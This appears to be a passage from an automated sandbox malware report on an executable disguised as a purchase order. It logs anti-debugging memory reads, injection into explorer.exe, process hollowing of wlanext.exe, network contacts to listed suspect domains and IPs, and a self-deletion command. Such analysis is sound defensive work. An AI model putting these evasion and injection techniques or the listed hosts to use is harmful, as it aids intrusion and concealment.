          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0394DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039E131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039F8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0392F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0392DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03953B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03953B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0392DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0395D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0395D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0393AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0393AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0395FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03952ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03952AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03925210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03925210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03925210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03925210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0392AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0392AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03943A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03938A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03964A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03964A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039EEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039B4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03929240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03929240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03929240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03929240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0396927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039DB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039DB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039F8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03952990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0395A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0394C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039A69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039B41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0392B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0392B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0392B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03929100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03929100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03929100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0395513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0395513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03944120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03944120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03944120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03944120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03944120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0394B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0394B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0392B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0392B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0392C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03929080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039A3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039A3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0395F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0395F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0395F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039690AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039BB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039258EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039F4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039F4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0395002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0395002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0395002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0395002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0395002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0393B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0393B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0393B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0393B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03940050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03940050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039F1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039E2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03938794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039A7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039A7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039A7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039637F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0394F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039BFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039BFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039F070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039F070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0395A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0395A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0395E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03924F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03924F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0393EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0393FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039F8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039BFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039F0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039F0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039F0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039A46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039F8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03968EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039536CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039DFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039376E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039516E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0395A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0395A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0392C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0392C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0392C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03958E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039E1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039DFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0392E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03937E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03937E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03937E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03937E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03937E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03937E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039EAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039EAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0394AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0394AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0394AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0394AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0394AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0393766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0395FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0395FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03952581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03952581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03952581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03952581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03922D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03922D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03922D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03922D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03922D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03951DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03951DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03951DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039F05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039F05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039535A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039A6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039D8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0393D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0393D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0392AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039EE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039F8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039AA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03954D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03954D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03954D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03947D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03963D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039A3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0394C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0394C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0393849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039F8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\wlanext.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.bookitstaugustine.com
          Source: C:\Windows\explorer.exeNetwork Connect: 166.62.28.107 80
          Source: C:\Windows\explorer.exeDomain query: www.hepimizdostuz.com
          Source: C:\Windows\explorer.exeNetwork Connect: 154.210.110.99 80
          Source: C:\Windows\explorer.exeDomain query: www.szmsbk.com
          Source: C:\Windows\explorer.exeDomain query: www.merkuryindustries.com
          Source: C:\Windows\explorer.exeDomain query: www.pradnyanamaya.com
          Source: C:\Windows\explorer.exeDomain query: www.hnchotels.com
          Source: C:\Windows\explorer.exeNetwork Connect: 123.31.43.181 80
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.132.70 80
          Source: C:\Windows\explorer.exeDomain query: www.accessibleageing.com
          Source: C:\Windows\explorer.exeNetwork Connect: 3.223.115.185 80
          Source: C:\Windows\explorer.exeNetwork Connect: 81.88.57.70 80
          Source: C:\Windows\explorer.exeDomain query: www.thelandcle.com
          Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80
          Source: C:\Windows\explorer.exeDomain query: www.beyju.store
          Source: C:\Windows\explorer.exeDomain query: www.theskineditco.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 185.199.108.153 80
          Source: C:\Windows\explorer.exeNetwork Connect: 85.17.172.1 80
          Source: C:\Windows\explorer.exeDomain query: www.tuyensinhhaiphong.com
          Source: C:\Windows\explorer.exeNetwork Connect: 52.15.160.167 80
          Source: C:\Windows\explorer.exeDomain query: www.belatopapparel.xyz
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\wlanext.exeThread register set: target process: 3424
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeSection unmapped: C:\Windows\SysWOW64\wlanext.exe base address: E50000
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess created: C:\Users\user\Desktop\PO45937008ADENGY.exe C:\Users\user\Desktop\PO45937008ADENGY.exe
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess created: C:\Users\user\Desktop\PO45937008ADENGY.exe C:\Users\user\Desktop\PO45937008ADENGY.exe
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess created: C:\Users\user\Desktop\PO45937008ADENGY.exe C:\Users\user\Desktop\PO45937008ADENGY.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO45937008ADENGY.exe'
